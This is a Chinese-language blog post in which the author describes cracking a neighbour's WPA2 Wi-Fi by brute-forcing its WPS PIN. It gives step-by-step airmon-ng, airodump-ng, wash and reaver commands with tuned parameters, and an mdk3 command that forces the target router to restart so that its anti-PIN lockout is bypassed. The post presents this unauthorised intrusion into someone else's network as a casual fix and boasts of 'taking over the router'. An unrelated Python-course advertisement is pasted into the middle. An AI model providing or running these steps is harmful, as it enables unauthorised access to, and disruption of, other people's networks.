大家好,我是冰河~~
今天高高興興地回到家,打開電腦,我靠,沒網!咋回事?連手機熱點也賊慢,要不蹭網?下載萬能鑰匙?果斷不能用萬能鑰匙!因為使用了萬能鑰匙,自家的Wifi密碼也會共享出去,那么,怎么辦?這難不倒我,于是,我打開了我的Kali作業系統,瞄準了隔壁妹子的Wifi
WPA2-PSK加密原理
很多人學習python,不知道從何學起, 很多人學習python,掌握了基本語法過后,不知道在哪里尋找案例上手, 很多已經做案例的人,卻不知道如何去學習更加高深的知識, 那么針對這三類人,我給大家提供一個好的學習平臺,免費領取視頻教程,電子書籍,以及課程的源代碼! QQ群:701698587 歡迎加入,一起討論 一起學習!
現在的路由器大多都默認用 WPA2-PSK 方式對無線網路進行加密了,不能再像 WEP 加密方式那樣好破解,使用字典又需要費心費力地整理字典,而且字典破解的效率還慢,所以我們需要更有效率的破解方法,好在現在大多數的路由器都提供 WPS 功能,通過這個功能,用戶可以使用 PIN 碼登錄到路由器上,但這個 PIN 碼的長度只有 8 位,而且可能的取值只有11000種(注意,不是 108 種),所以我們可以進行簡單粗暴的窮舉 PIN 碼破解,而且我們可以推斷出這種破解方法在目標 AP 開啟了 WPS 功能的情況下是可以百分之百破解它的,這其實是很古老的破解手段了,但至今依然奏效,
操作步驟
1.切換無線網卡到監聽模式
airmon-ng start wlan0
2刺探附近 WLAN 網路(這個命令所給的引數值可以在 步驟1 完成后從提示資訊中查看到)
airodump-ng wlan0mon
3.找出開啟了 WPS 功能、可以使用 PIN碼 登錄的路由器,并另外記錄下該 AP 的 BSSID(約等于該 AP 的 MAC 地址)
wash -i wlan0mon
4.開始進行 PIN碼 窮舉破解(注意末尾的引數是 2 個小寫字母 v)
reaver -i wlan0mon -b xx:xx:xx:xx:xx:xx -vv
引數說明:
-i 無線網卡名稱
-b 目標AP的mac地址
-a 自動檢測目標AP最佳配置
-S 使用最小的DH key,可以提高破解速度
-vv 顯示更多的非嚴重警告(注意這是什么 2 個小寫字母 v)
-d 即delay每窮舉一次的閑置時間 預設為1秒
-c 信道編號
-p PIN碼四位或八位 //可以用8位直接找到密碼,
破解時推薦使用這個命令:reaver -i wlan0mon -b D8:15:0D:D6:13:92 -a -S -d9 -t9 -vv,因為–d9 –t9引數可以防止pin死路由器
5.等待破解完成(這個破解可能會時間比較長,和你的目標 AP 有關,隔壁妹子沒有網路安全意識,密碼很脆弱,只用了幾分鐘便破解了),這期間我們可以查看到窮舉破解花費的時間、預計剩余時間、窮舉PIN碼進度 資訊
6.破解成功
7.成功聯網
8.拿下路由器
注意事項
如果在執行 reaver 命令后看到有 WARNING: Failed to associate with xx:xx:xx:xx:xx:xx 這樣的提示資訊,那么應該是你選擇了一個不具備或關閉了 WPS 功能的路由器,這種情況下就執行wash 命令并重新選擇一個路由器吧,
如果在執行 reaver 命令后看到有 warning detected ap rate limiting waiting 60 seconds before re-checking 這樣的提示資訊,這表示目標路由器開啟了防 PIN破解 功能,因為我們是窮舉 PIN碼 進行破解的,當連續使用超過某個次數的 PIN碼 后,路由器會暫時鎖定 WPS 功能一段時間,這種情況下要么我們耐心等待其恢復 WPS 功能,要么執行 mdk3 wlan0mon a -a xx:xx:xx:xx:xx:xx (這是上面的目標AP的MAC地址)命令讓路由器主動重啟或被動重啟以恢復 WPS 功能,
轉載請註明出處,本文鏈接:https://www.uj5u.com/houduan/304159.html
標籤:Python
